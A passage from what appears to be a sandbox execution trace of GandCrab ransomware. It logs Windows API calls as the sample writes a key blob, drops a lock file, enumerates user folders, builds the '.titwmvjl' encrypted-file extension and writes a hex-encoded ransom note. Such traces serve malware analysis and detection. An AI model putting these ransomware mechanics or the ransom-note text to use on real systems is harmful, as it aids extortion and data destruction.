76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.808] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0071.809] CloseHandle (hObject=0x2c4) returned 1 [0071.809] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.809] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.809] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x79)) [0071.809] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.810] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.810] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.810] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock") returned 83 [0071.810] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0071.811] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.811] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 59 [0071.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0071.812] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5036f8 [0071.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.812] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.812] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.812] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0071.812] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0071.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock" [0071.812] lstrlenW (lpString=".titwmvjl") returned 9 [0071.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock") returned 83 [0071.812] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.813] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 92 [0071.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\d2ca4a09d2ca4deb61a.lock") returned 83 [0071.813] lstrlenW (lpString=".lock") returned 5 [0071.813] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.813] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0071.813] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.813] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.813] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.813] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0071.813] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0071.813] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000" [0071.813] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0071.813] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.814] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.815] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.815] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt") returned 126 [0071.815] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0071.818] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\